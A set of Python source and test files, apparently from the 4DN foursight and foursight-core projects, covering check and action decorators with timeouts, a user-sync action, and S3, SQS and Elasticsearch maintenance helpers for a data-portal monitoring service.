actions = sync_users_oh_check_result['actions']
user_list = get_oh_google_sheet()
action_logs = {'patch_success': [], 'patch_failure': [], 'post_success': [], 'post_failure': [], 'write_to_sheet_failure': ''}
# add new users to the data portal
if actions.get('add_user'):
for a_user in actions['add_user']:
del a_user['lab_score']
if 'OH_lab' in a_user:
del a_user['OH_lab']
if 'Log' in a_user:
del a_user['Log']
try:
ff_utils.post_metadata(a_user, 'user', my_auth)
except Exception as e:
action_logs['post_failure'].append({a_user['email']: str(e)})
else:
action_logs['post_success'].append(a_user['email'])
# Add permissions (lab and awards) to existing users in the data portal
if actions.get('add_credentials'):
for a_user in actions['add_credentials']:
user_uuid = a_user['uuid']
del a_user['uuid']
del a_user['lab_score']
if 'OH_lab' in a_user:
del a_user['OH_lab']
if 'Log' in a_user:
del a_user['Log']
try:
ff_utils.patch_metadata(a_user, user_uuid, my_auth)
except Exception as e:
action_logs['patch_failure'].append({user_uuid: str(e)})
else:
action_logs['patch_success'].append(a_user['email'])
# remove user's permissions from the data portal
if actions.get('delete_user'):
for a_user in actions['delete_user']:
# Delete the user permissions: submits_for, groups, viewing_groups and lab.
try:
ff_utils.delete_field(a_user, 'submits_for, lab, viewing_groups, groups', key=my_auth)
except Exception as e:
action_logs['patch_failure'].append({a_user: str(e)})
else:
action_logs['patch_success'].append(a_user)
# update google sheet
# we will create a modified version of the full stack and write on google sheet at once
worksheet = get_oh_google_sheet()
table = worksheet.get_all_values()
# Convert table data into an ordered dictionary
df = pd.DataFrame(table[1:], columns=table[0])
user_list = df.to_dict(orient='records', into=OrderedDict)
# generate records to write
gs_write = []
rows = user_list[0].keys()
# update dcic user info on excel
update_set = actions['update_excel']
for a_record in user_list:
dcic_uuid = a_record['DCIC UUID']
if dcic_uuid in update_set:
a_record.update(update_set[dcic_uuid])
# patch user info with dcic information for existing OH info
patch_set = actions['patch_excel']
for a_record in user_list:
oh_mail = a_record['OH Account Email']
if oh_mail in patch_set:
a_record.update(patch_set[oh_mail])
# inactivate user from dcic in excel
inactivate_set = actions['inactivate_excel']
for a_record in user_list:
dcic_uuid = a_record['DCIC UUID']
if dcic_uuid in inactivate_set:
a_record.update(inactivate_set[dcic_uuid])
# add new lines for new users
for new_line in actions['add_excel']:
temp = OrderedDict((key, "") for key in rows)
temp.update(new_line)
user_list.append(temp)
    # Writing the data to the list gs_write
row = 1
for r, line in enumerate(user_list):
row = r + 1
# write columns
if row == 1:
for c, key in enumerate(line):
col = c + 1
gs_write.append(gspread.models.Cell(row, col, key))
row = r + 2
# write values
for c, key in enumerate(line):
col = c + 1
gs_write.append(gspread.models.Cell(row, col, line[key]))
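    # (note) row 1 holds the column headers; the data for record r is written to row r + 2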
    # Write the cells to the worksheet
try:
worksheet.update_cells(gs_write)
except Exception as e:
action_logs['write_to_sheet_failure'] = str(e)
# the return value from this operation will look like this
# {'spreadsheetId': '<KEY>',
# 'updatedCells': 10944,
# 'updatedColumns': 18,
# 'updatedRange': "'t est updates'!A1:R608",
# 'updatedRows': 608}
if action_logs['patch_failure'] or action_logs['post_failure'] or action_logs['write_to_sheet_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def replace_name_status(connection, **kwargs):
"""
    Template check: replace `replace_name` with your check/action name for a quick setup.
Keyword arguments:
"""
check = CheckResult(connection, 'replace_name_status')
my_auth = connection.ff_keys
check.action = "replace_name_start"
check.description = "add description"
check.brief_output = []
check.summary = ""
check.full_output = {}
check.status = 'PASS'
check.allow_action = False
# check indexing queue
env = connection.ff_env
indexing_queue = ff_utils.stuff_in_queues(env, check_secondary=True)
# if you need to check for indexing queue
if indexing_queue:
check.status = 'PASS' # maybe use warn?
check.brief_output = ['Waiting for indexing queue to clear']
check.summary = 'Waiting for indexing queue to clear'
check.full_output = {}
return check
query_base = '/search/?type=NotMyType'
q = query_base
# print(q)
res = ff_utils.search_metadata(q, my_auth)
# check if anything in scope
if not res:
check.status = 'PASS'
check.summary = 'All Good!'
check.brief_output = ['All Good!']
check.full_output = {}
return check
for a_res in res:
# do something
pass
check.summary = ""
check.full_output = {}
check.status = 'WARN'
check.allow_action = True
return check
@action_function()
def replace_name_start(connection, **kwargs):
"""Start runs by sending compiled input_json to run_workflow endpoint"""
action = ActionResult(connection, 'replace_name_start')
my_auth = connection.ff_keys
my_env = connection.ff_env
replace_name_check_result = action.get_associated_check_result(kwargs).get('full_output', {})
# do something
for a_res in replace_name_check_result:
assert my_auth
assert my_env
break
return action
``` |
{
"source": "4dn-dcic/foursight-core",
"score": 2
} |
#### File: 4dn-dcic/foursight-core/app.py
```python
from chalice import Chalice
# Minimal app.py; used to verify foursight-core packaging scripts
app = Chalice(app_name='foursight_core')
@app.route('/')
def index():
return {'minimal': 'foursight_core'}
```
#### File: checks/helpers/sys_utils.py
```python
import re
from datetime import datetime, timedelta
from dateutil import tz
from dcicutils import (
es_utils,
)
from dcicutils.misc_utils import Retry
BUILD_INDICES_REGEX = re.compile('^[0-9]') # build indices are prefixed by numbers
def wipe_build_indices(es_url, check):
""" Wipes all number-prefixed indices on the given es_url. Be careful not to run while
builds are running as this will cause them to fail.
"""
check.status = 'PASS'
check.summary = check.description = 'Wiped all test indices on url: %s' % es_url
client = es_utils.create_es_client(es_url, True)
full_output = []
_, indices = cat_indices(client) # index name is index 2 in row
for index in indices:
try:
index_name = index[2]
except IndexError: # empty [] sometimes returned by API call
continue
if re.match(BUILD_INDICES_REGEX, index_name) is not None:
try:
resp = Retry.retrying(client.indices.delete, retries_allowed=3)(index=index_name)
except Exception as e:
full_output.append({'acknowledged': True, 'error': str(e)})
else:
full_output.append(resp)
if any(output['acknowledged'] is not True for output in full_output):
check.status = 'FAIL'
check.summary = check.description = 'Failed to wipe all test indices, see full output'
check.full_output = full_output
return check
def parse_datetime_to_utc(time_str, manual_format=None):
"""
Attempt to parse the string time_str with the given string format.
If no format is given, attempt to automatically parse the given string
that may or may not contain timezone information.
Returns a datetime object of the string in UTC
or None if the parsing was unsuccessful.
"""
if manual_format and isinstance(manual_format, str):
timeobj = datetime.strptime(time_str, manual_format)
else: # automatic parsing
if len(time_str) > 26 and time_str[26] in ['+', '-']:
try:
timeobj = datetime.strptime(time_str[:26],'%Y-%m-%dT%H:%M:%S.%f')
except ValueError:
return None
if time_str[26]=='+':
timeobj -= timedelta(hours=int(time_str[27:29]), minutes=int(time_str[30:]))
elif time_str[26]=='-':
timeobj += timedelta(hours=int(time_str[27:29]), minutes=int(time_str[30:]))
elif len(time_str) == 26 and '+' not in time_str[-6:] and '-' not in time_str[-6:]:
            # nothing known about tz, just parse it without tz in this case
try:
timeobj = datetime.strptime(time_str[0:26],'%Y-%m-%dT%H:%M:%S.%f')
except ValueError:
return None
else:
# last try: attempt without milliseconds
try:
timeobj = datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%S")
except ValueError:
return None
return timeobj.replace(tzinfo=tz.tzutc())
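# Illustrative example (not part of the original module): a string 5 hours ahead of UTC
# is shifted back, e.g.
#   parse_datetime_to_utc('2017-04-09T17:34:53.423589+05:00')
#   -> datetime(2017, 4, 9, 12, 34, 53, 423589, tzinfo=tzutc())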
def cat_indices(client):
""" Wrapper function for the ES API _cat/indices so that the result returned is comprehensible.
:param client: es client to use
:returns: 2-tuple lists of header, rows
"""
if not client:
return [], []
indices = client.cat.indices(v=True).split('\n')
split_indices = [ind.split() for ind in indices]
headers = split_indices.pop(0) # first row is header
return headers, split_indices
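# Illustrative usage (not part of the original module): `headers, rows = cat_indices(client)`;
# each row is a whitespace-split line from _cat/indices, so rows[i][2] is the index name
# that wipe_build_indices() above checks against BUILD_INDICES_REGEX.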
```
#### File: foursight-core/foursight_core/decorators.py
```python
import traceback
import signal
import time
import sys
import os
from functools import wraps
from .check_schema import CheckSchema
from .run_result import (
CheckResult as CheckResultBase,
ActionResult as ActionResultBase
)
from .exceptions import BadCheckOrAction
from .sqs_utils import SQS
class Decorators(object):
CHECK_DECO = 'check_function'
ACTION_DECO = 'action_function'
POLL_INTERVAL = 10 # check child process every 10 seconds
CHECK_TIMEOUT = 870 # in seconds. set to less than lambda limit (900 s)
def __init__(self, foursight_prefix):
if os.environ.get('CHECK_TIMEOUT'):
self.set_timeout(os.environ.get('CHECK_TIMEOUT'))
self.prefix = foursight_prefix
self.sqs = SQS(self.prefix)
def CheckResult(self, *args, **kwargs):
check = CheckResultBase(*args, **kwargs)
check.set_prefix(self.prefix)
return check
def ActionResult(self, *args, **kwargs):
action = ActionResultBase(*args, **kwargs)
action.set_prefix(self.prefix)
return action
def set_timeout(self, timeout):
try:
timeout = int(timeout)
except ValueError:
print('ERROR! Timeout must be an integer. You gave: %s' % timeout)
else:
self.CHECK_TIMEOUT = timeout
def check_function(self, *default_args, **default_kwargs):
"""
Import decorator, used to decorate all checks.
Sets the check_decorator attribute so that methods can be fetched.
Any kwargs provided to the decorator will be passed to the function
if no kwargs are explicitly passed.
Handles all exceptions within running of the check, including validation
issues/some common errors when writing checks. Will also keep track of overall
runtime and cancel the check with status=ERROR if runtime exceeds CHECK_TIMEOUT.
If an exception is raised, will store the result in full_output and
return an ERROR CheckResult.
"""
def check_deco(func):
@wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
kwargs = self.handle_kwargs(kwargs, default_kwargs)
parent_pid = os.getpid()
child_pid = os.fork()
if child_pid != 0: # we are the parent who will execute the check
try:
check = func(*args, **kwargs)
check.validate()
except Exception as e:
# connection should be the first (and only) positional arg
check = self.CheckResult(args[0], func.__name__)
check.status = 'ERROR'
check.description = 'Check failed to run. See full output.'
check.full_output = traceback.format_exc().split('\n')
kwargs['runtime_seconds'] = round(time.time() - start_time, 2)
check.kwargs = kwargs
os.kill(child_pid, signal.SIGKILL) # we finished, so kill child
return check.store_result()
else: # we are the child who handles the timeout
partials = {'name': func.__name__, 'kwargs': kwargs, 'is_check': True,
'start_time': start_time, 'connection': args[0]}
self.do_timeout(parent_pid, partials)
wrapper.check_decorator = self.CHECK_DECO
return wrapper
return check_deco
def action_function(self, *default_args, **default_kwargs):
"""
Import decorator, used to decorate all actions.
Required for action functions.
Any kwargs provided to the decorator will be passed to the function
if no kwargs are explicitly passed.
Handles all exceptions within running of the action, including validation
issues/some common errors when writing actions. Will also keep track of overall
        runtime and cancel the action with status=FAIL if runtime exceeds CHECK_TIMEOUT.
If an exception is raised, will store the result in output and return an
ActionResult with status FAIL.
"""
def action_deco(func):
@wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
kwargs = self.handle_kwargs(kwargs, default_kwargs)
parent_pid = os.getpid()
child_pid = os.fork()
if child_pid != 0: # we are the parent who will execute the check
try:
if 'check_name' not in kwargs or 'called_by' not in kwargs:
raise BadCheckOrAction('Action requires check_name and called_by in its kwargs.')
action = func(*args, **kwargs)
action.validate()
except Exception as e:
# connection should be the first (and only) positional arg
action = self.ActionResult(args[0], func.__name__)
action.status = 'FAIL'
action.description = 'Action failed to run. See output.'
action.output = traceback.format_exc().split('\n')
kwargs['runtime_seconds'] = round(time.time() - start_time, 2)
action.kwargs = kwargs
os.kill(child_pid, signal.SIGKILL) # we finished, so kill child
return action.store_result()
else: # we are the child who handles the timeout
partials = {'name': func.__name__, 'kwargs': kwargs, 'is_check': False,
'start_time': start_time, 'connection': args[0]}
self.do_timeout(parent_pid, partials)
wrapper.check_decorator = self.ACTION_DECO
return wrapper
return action_deco
def do_timeout(self, parent_pid, partials):
""" Wrapper for below method that handles:
1. Polling across the CHECK_TIMEOUT at POLL_INTERVAL
2. Exiting if we succeeded (the parent process died)
3. Killing the parent if it timed out
4. Invoking the timeout handler if it timed out
:arg parent_pid: parent pid to check on/kill if necessary
:arg partials: partial result to be passed to timeout handler if necessary
"""
for t in range(self.CHECK_TIMEOUT // self.POLL_INTERVAL): # Divide CHECK_TIMEOUT into POLL_INTERVAL slices
time.sleep(self.POLL_INTERVAL)
if not self.pid_is_alive(parent_pid):
sys.exit(0)
# We have timed out. Kill the parent and invoke the timeout handler.
# NOTE: Timeouts in Pytest will trigger undefined behavior since the parent is Pytest, not the thing
# executing the check. Execute Pytest with --forked option to override this.
os.kill(parent_pid, signal.SIGTERM)
self.timeout_handler(partials)
def timeout_handler(self, partials, signum=None, frame=None):
"""
Custom handler for signal that stores the current check
or action with the appropriate information and then exits using sys.exit
"""
if partials['is_check']:
result = self.CheckResult(partials['connection'], partials['name'])
result.status = 'ERROR'
else:
result = self.ActionResult(partials['connection'], partials['name'])
result.status = 'FAIL'
result.description = 'AWS lambda execution reached the time limit. Please see check/action code.'
kwargs = partials['kwargs']
kwargs['runtime_seconds'] = round(time.time() - partials['start_time'], 2)
result.kwargs = kwargs
result.store_result()
        # need to delete the sqs message and propagate if this is using the queue
if kwargs.get('_run_info') and {'receipt', 'sqs_url'} <= set(kwargs['_run_info'].keys()):
runner_input = {'sqs_url': kwargs['_run_info']['sqs_url']}
self.sqs.delete_message_and_propogate(runner_input, kwargs['_run_info']['receipt'])
sys.exit('-RUN-> TIMEOUT for execution of %s. Elapsed time is %s seconds; keep under %s.'
% (partials['name'], kwargs['runtime_seconds'], self.CHECK_TIMEOUT))
@classmethod
def handle_kwargs(cls, kwargs, default_kwargs):
# add all default args that are not defined in kwargs
# also ensure 'uuid' and 'primary' are in there
for key in default_kwargs:
if key not in kwargs:
kwargs[key] = default_kwargs[key]
if 'uuid' not in kwargs:
kwargs['uuid'] = CheckSchema().create_uuid()
if 'primary' not in kwargs:
kwargs['primary'] = False
return kwargs
@classmethod
def pid_is_alive(cls, pid):
"""
Returns True if pid is still alive
"""
try:
os.kill(pid, 0) # do not send a signal, just error check
except OSError:
return False
else:
return True
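    # Illustrative sketch (not part of the original class): a check module would typically
    # use an instance of this class roughly like so, assuming `deco = Decorators('foursight')`
    # is constructed elsewhere:
    #
    #   @deco.check_function()
    #   def my_check(connection, **kwargs):
    #       check = deco.CheckResult(connection, 'my_check')
    #       check.status = 'PASS'
    #       return check
    #
    # The wrapper then validates and stores the returned result and enforces CHECK_TIMEOUT.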
```
#### File: foursight-core/foursight_core/environment.py
```python
import os
import json
from .s3_connection import S3Connection
class Environment(object):
def __init__(self, foursight_prefix):
self.prefix = foursight_prefix
self.s3_connection = S3Connection(self.get_env_bucket_name())
def get_env_bucket_name(self):
return self.prefix + '-envs'
def list_environment_names(self):
"""
Lists all environments in the foursight-envs s3. Returns a list of names
"""
return self.s3_connection.list_all_keys()
def list_valid_schedule_environment_names(self):
"""Lists all valid environ names used in schedules including 'all'"""
return self.list_environment_names() + ['all']
def is_valid_environment_name(self, env):
"""check if env is a valid environment name"""
if env in self.list_environment_names():
return True
else:
return False
def get_environment_info_from_s3(self, env_name):
return self.s3_connection.get_object(env_name)
def get_environment_and_bucket_info(self, env_name, stage):
env_res = self.get_environment_info_from_s3(env_name)
# check that the keys we need are in the object
if isinstance(env_res, dict) and {'fourfront', 'es'} <= set(env_res):
env_entry = {
'fourfront': env_res['fourfront'],
'es': env_res['es'],
'ff_env': env_res.get('ff_env', ''.join(['fourfront-', env_name])),
'bucket': ''.join([self.prefix + '-', stage, '-', env_name])
}
return env_entry
else:
raise Exception("malformatted environment info on s3 for key %s" % env_name)
def get_selected_environment_names(self, env_name):
if env_name == 'all':
return self.list_environment_names()
elif self.is_valid_environment_name(env_name):
return [env_name]
else:
raise Exception("not a valid env name")
def get_environment_and_bucket_info_in_batch(self, stage, env='all', envs=None):
"""
Generate environment information from the envs bucket in s3.
Returns a dictionary keyed by environment name with value of a sub-dict
with the fields needed to initiate a connection.
:param env: allows you to specify a single env to be initialized
:param envs: allows you to specify multiple envs to be initialized
"""
if envs is not None:
env_keys = envs
else:
try:
env_keys = self.get_selected_environment_names(env)
except:
return {} # provided env is not in s3
environments = {}
for env_key in env_keys:
environments[env_key] = self.get_environment_and_bucket_info(env_key, stage)
return environments
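    # Illustrative example (assumed values): for prefix 'foursight', stage 'prod' and env
    # 'data', get_environment_and_bucket_info() returns something like
    #   {'fourfront': <portal url>, 'es': <es url>, 'ff_env': 'fourfront-data',
    #    'bucket': 'foursight-prod-data'}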
```
#### File: foursight-core/foursight_core/s3_connection.py
```python
from .abstract_connection import AbstractConnection
import json
import requests
import boto3
import datetime
class S3Connection(AbstractConnection):
def __init__(self, bucket_name):
self.client = boto3.client('s3')
self.resource = boto3.resource('s3')
self.cw = boto3.client('cloudwatch') # for s3 bucket stats
self.bucket = bucket_name
self.location = 'us-east-1'
# create the bucket if it doesn't exist
self.head_info = self.test_connection()
self.status_code = self.head_info.get('ResponseMetadata', {}).get("HTTPStatusCode", 404)
if self.status_code == 404:
self.create_bucket()
# get head_info again
self.head_info = self.test_connection()
self.status_code = self.head_info.get('ResponseMetadata', {}).get("HTTPStatusCode", 404)
def put_object(self, key, value):
try:
self.client.put_object(Bucket=self.bucket, Key=key, Body=value)
except:
return None
else:
return (key, value)
def get_object(self, key):
# return found bucket content or None on an error
try:
response = self.client.get_object(Bucket=self.bucket, Key=key)
body = response['Body'].read()
return json.loads(body)
except json.JSONDecodeError:
return body
except:
return None
def get_size(self):
"""
Gets the number of keys stored on this s3 connection. This is a very slow
operation since it has to enumerate all keys.
"""
bucket = self.resource.Bucket(self.bucket)
return sum(1 for _ in bucket.objects.all())
def get_size_bytes(self):
"""
Uses CloudWatch client to get the bucket size in bytes of this bucket.
Start and EndTime represent the window on which the bucket size will be
calculated. An average is taken across the entire window (Period=86400)
Useful for checks - may need further configuration
"""
now = datetime.datetime.utcnow()
resp = self.cw.get_metric_statistics(Namespace='AWS/S3',
MetricName='BucketSizeBytes',
Dimensions=[
{'Name': 'BucketName', 'Value': self.bucket},
{'Name': 'StorageType', 'Value': 'StandardStorage'}],
Statistics=['Average'],
Period=86400,
StartTime=(now-datetime.timedelta(days=1)).isoformat(),
EndTime=now.isoformat())
return resp['Datapoints']
def list_all_keys_w_prefix(self, prefix, records_only=False):
"""
List all s3 keys with the given prefix (should look like
        '<prefix>/'). If records_only == True, then append '2' to the
        prefix to only find records that are in timestamp form (this will
        exclude 'latest' and 'primary').
s3 only returns up to 1000 results at once, hence the need for the
for loop. NextContinuationToken shows if there are more results to
return.
Returns the list of keys.
Also see list_all_keys()
"""
if not self.bucket:
return []
all_keys = []
# make sure prefix ends with a slash (bucket format)
prefix = ''.join([prefix, '/']) if not prefix.endswith('/') else prefix
# this will exclude 'primary' and 'latest' in records_only == True
        # use '2' because it is the first digit of the year (in uuid)
        use_prefix = ''.join([prefix, '2']) if records_only else prefix
bucket = self.resource.Bucket(self.bucket)
for obj in bucket.objects.filter(Prefix=use_prefix):
all_keys.append(obj.key)
# not sorted at this point
return all_keys
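        # Illustrative example: with prefix 'my_check' and records_only=True the effective
        # prefix becomes 'my_check/2', which matches timestamped keys (uuids start with the
        # year) but not 'my_check/latest' or 'my_check/primary'.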
def list_all_keys(self):
if not self.bucket:
return []
all_keys = []
bucket = self.resource.Bucket(self.bucket)
for obj in bucket.objects.all():
all_keys.append(obj.key)
return all_keys
def delete_keys(self, key_list):
# boto3 requires this setup
to_delete = {'Objects' : [{'Key': key} for key in key_list]}
return self.client.delete_objects(Bucket=self.bucket, Delete=to_delete)
def test_connection(self):
try:
bucket_resp = self.client.head_bucket(Bucket=self.bucket)
except:
return {'ResponseMetadata': {'HTTPStatusCode': 404}}
return bucket_resp
def create_bucket(self, manual_bucket=None):
# us-east-1 is default location
# add CreateBucketConfiguration w/ Location key for a different region
# echoes bucket name if successful, None otherwise
bucket = manual_bucket if manual_bucket else self.bucket
try:
self.client.create_bucket(Bucket=bucket)
except:
return None
else:
return bucket
```
#### File: foursight-core/foursight_core/sqs_utils.py
```python
from datetime import datetime
import boto3
import json
from .stage import Stage
class SQS(object):
"""
class SQS is a collection of utils related to Foursight queues
"""
def __init__(self, foursight_prefix):
self.stage = Stage(foursight_prefix)
def invoke_check_runner(self, runner_input):
"""
Simple function to invoke the next check_runner lambda with runner_input
(dict containing {'sqs_url': <str>})
"""
client = boto3.client('lambda')
# InvocationType='Event' makes asynchronous
        # try/except since async invokes can be problematic
try:
response = client.invoke(
FunctionName=self.stage.get_runner_name(),
InvocationType='Event',
Payload=json.dumps(runner_input)
)
except:
response = client.invoke(
FunctionName=self.stage.get_runner_name(),
Payload=json.dumps(runner_input)
)
return response
def delete_message_and_propogate(self, runner_input, receipt, propogate=True):
"""
Delete the message with given receipt from sqs queue and invoke the next
lambda runner.
Args:
runner_input (dict): runner info, should minimally have 'sqs_url'
receipt (str): SQS message receipt
propogate (bool): if True (default), invoke another check runner lambda
Returns:
None
"""
sqs_url = runner_input.get('sqs_url')
if not sqs_url or not receipt:
return
client = boto3.client('sqs')
client.delete_message(
QueueUrl=sqs_url,
ReceiptHandle=receipt
)
if propogate is True:
self.invoke_check_runner(runner_input)
def recover_message_and_propogate(self, runner_input, receipt, propogate=True):
"""
Recover the message with given receipt to sqs queue and invoke the next
lambda runner.
Changing message VisibilityTimeout to 15 seconds means the message will be
available to the queue in that much time. This is a slight lag to allow
dependencies to process.
NOTE: VisibilityTimeout should be less than WaitTimeSeconds in run_check_runner
Args:
runner_input (dict): runner info, should minimally have 'sqs_url'
receipt (str): SQS message receipt
propogate (bool): if True (default), invoke another check runner lambda
Returns:
None
"""
sqs_url = runner_input.get('sqs_url')
if not sqs_url or not receipt:
return
client = boto3.client('sqs')
client.change_message_visibility(
QueueUrl=sqs_url,
ReceiptHandle=receipt,
VisibilityTimeout=15
)
if propogate is True:
self.invoke_check_runner(runner_input)
def get_sqs_queue(self):
"""
Returns boto3 sqs resource
"""
queue_name = self.stage.get_queue_name()
sqs = boto3.resource('sqs')
try:
queue = sqs.get_queue_by_name(QueueName=queue_name)
except:
queue = sqs.create_queue(
QueueName=queue_name,
Attributes={
'VisibilityTimeout': '900',
'MessageRetentionPeriod': '3600'
}
)
return queue
@classmethod
def send_sqs_messages(cls, queue, environ, check_vals, uuid=None):
"""
Send messages to SQS queue. Check_vals are entries within a check_group.
Optionally, provide a uuid that will be queued as the uuid for the run; if
not provided, datetime.utcnow is used
Args:
queue: boto3 sqs resource (from get_sqs_queue)
environ (str): foursight environment name
check_vals (list): list of formatted check vals, like those from
check_utils.CheckHandler().get_check_schedule
uuid (str): optional string uuid
Returns:
str: uuid of queued messages
"""
# uuid used as the MessageGroupId
if not uuid:
uuid = datetime.utcnow().isoformat()
# append environ and uuid as first elements to all check_vals
proc_vals = [[environ, uuid] + val for val in check_vals]
for val in proc_vals:
response = queue.send_message(MessageBody=json.dumps(val))
return uuid
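        # Illustrative example: each message body is json.dumps([environ, uuid] + check_val),
        # so the consumer can recover the environment and run uuid plus the scheduled check
        # info from a single SQS message.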
@classmethod
def get_sqs_attributes(cls, sqs_url):
"""
        Returns a dict of the desired attributes from the queue with given url
"""
backup = {
'ApproximateNumberOfMessages': 'ERROR',
'ApproximateNumberOfMessagesNotVisible': 'ERROR'
}
client = boto3.client('sqs')
try:
result = client.get_queue_attributes(
QueueUrl=sqs_url,
AttributeNames=[
'ApproximateNumberOfMessages',
'ApproximateNumberOfMessagesNotVisible'
]
)
except:
return backup
return result.get('Attributes', backup)
```
#### File: foursight-core/foursight_core/stage.py
```python
import os
class Stage(object):
prod_stage_name = 'prod'
def __init__(self, foursight_prefix):
self.prefix = foursight_prefix
@classmethod
def get_stage_from_env_variable(cls):
# set environmental variables in .chalice/config.json
return os.environ.get('chalice_stage', 'dev') # default to dev
@classmethod
def get_stage(cls):
stage = cls.get_stage_from_env_variable()
if stage == 'test':
stage = 'dev'
return stage
def get_queue_name(self):
return '-'.join([self.prefix, self.get_stage_from_env_variable(), 'check_queue'])
def get_runner_name(self):
check_runner = os.environ.get('CHECK_RUNNER', None)
if not check_runner:
check_runner = '-'.join([self.prefix, self.get_stage(), 'check_runner'])
return check_runner
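    # Illustrative example (assumed prefix): with foursight_prefix 'foursight' and stage
    # 'dev', get_queue_name() yields 'foursight-dev-check_queue' and get_runner_name()
    # falls back to 'foursight-dev-check_runner' when CHECK_RUNNER is unset.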
@classmethod
def is_stage_prod(cls):
if cls.get_stage() == cls.prod_stage_name:
return True
else:
return False
```
#### File: foursight-core/tests/test_helpers.py
```python
from dateutil import tz
from foursight_core.checks.helpers import sys_utils
class TestHelpers():
timestr_1 = '2017-04-09T17:34:53.423589+00:00' # UTC
timestr_2 = '2017-04-09T17:34:53.423589+05:00' # 5 hours ahead of UTC
timestr_3 = '2017-04-09T17:34:53.423589-05:00' # 5 hours behind of UTC
timestr_4 = '2017-04-09T17:34:53.423589'
timestr_5 = '2017-04-09T17:34:53'
timestr_bad_1 = '2017-04-0589+00:00'
timestr_bad_2 = '2017-xxxxxT17:34:53.423589+00:00'
timestr_bad_3 = '2017-xxxxxT17:34:53.423589'
def test_parse_datetime_to_utc(self):
[dt_tz_a, dt_tz_b, dt_tz_c] = ['None'] * 3
for t_str in [self.timestr_1, self.timestr_2, self.timestr_3, self.timestr_4]:
dt = sys_utils.parse_datetime_to_utc(t_str)
assert (dt is not None)
assert (dt.tzinfo is not None and dt.tzinfo == tz.tzutc())
if t_str == self.timestr_1:
dt_tz_a = dt
elif t_str == self.timestr_2:
dt_tz_b = dt
elif t_str == self.timestr_3:
dt_tz_c = dt
assert (dt_tz_c > dt_tz_a > dt_tz_b)
for bad_tstr in [self.timestr_bad_1, self.timestr_bad_2, self.timestr_bad_3]:
dt_bad = sys_utils.parse_datetime_to_utc(bad_tstr)
assert (dt_bad is None)
# use a manual format
dt_5_man = sys_utils.parse_datetime_to_utc(self.timestr_5, manual_format="%Y-%m-%dT%H:%M:%S")
dt_5_auto = sys_utils.parse_datetime_to_utc(self.timestr_5)
assert (dt_5_auto == dt_5_man)
```
#### File: foursight-core/tests/test_version.py
```python
import os
from dcicutils.qa_utils import VersionChecker
def test_version_checker_use_dcicutils_changelog():
class MyVersionChecker(VersionChecker):
PYPROJECT = os.path.join(os.path.dirname(__file__), "../pyproject.toml")
CHANGELOG = os.path.join(os.path.dirname(__file__), "../CHANGELOG.rst")
MyVersionChecker.check_version()
``` |
{
"source": "4dn-dcic/foursight",
"score": 2
} |
#### File: foursight/tests/test_check_utils.py
```python
from conftest import *
class TestCheckUtils():
environ = DEV_ENV # hopefully this is up
app_utils_obj = app_utils.AppUtils()
connection = app_utils_obj.init_connection(environ)
check_handler = app_utils_obj.check_handler
def test_get_check_strings(self):
# do this for every check
all_check_strs = self.check_handler.get_check_strings()
for check_str in all_check_strs:
get_check = check_str.split('/')[1]
chalice_resp = self.app_utils_obj.run_get_check(self.environ, get_check)
body = chalice_resp.body
print("chalice_resp.body= " + str(body))
if body.get('status') == 'success':
assert (chalice_resp.status_code == 200)
if body.get('data') is None: # check not run yet
continue
assert (body.get('data', {}).get('name') == get_check)
assert (body.get('data', {}).get('status') in ['PASS', 'WARN', 'FAIL', 'ERROR', 'IGNORE'])
elif body.get('status') == 'error':
error_msg = "Not a valid check or action."
assert (body.get('description') == error_msg)
# test a specific check
one_check_str = self.check_handler.get_check_strings('indexing_progress')
assert (one_check_str == 'system_checks/indexing_progress')
assert (one_check_str in all_check_strs)
# test a specific check that doesn't exist
bad_check_str = self.check_handler.get_check_strings('not_a_real_check')
assert (bad_check_str is None)
def test_validate_check_setup(self):
assert (self.check_handler.validate_check_setup(self.check_handler.CHECK_SETUP) == self.check_handler.CHECK_SETUP)
# make sure modules were added
for check in self.check_handler.CHECK_SETUP.values():
assert ('module' in check)
        # do a whole bunch of validation failure cases
bad_setup = {'not_a_check': {}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('does not have a proper check function defined' in str(exc.value))
bad_setup = {'indexing_progress': []}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must be a dictionary' in str(exc.value))
bad_setup = {'indexing_progress': {'title': {}, 'group': {}, 'blah': {}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have the required keys' in str(exc.value))
bad_setup = {'indexing_progress': {'title': {}, 'group': {}, 'schedule': []}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a string value for field' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': []}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a dictionary value for field' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a list of "display" environments' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': []}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a dictionary value' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'not_an_env': []}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('is not an existing environment' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': []}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a dictionary value' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': {'kwargs': []}}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a dictionary value' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': {'dependencies': {}}}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
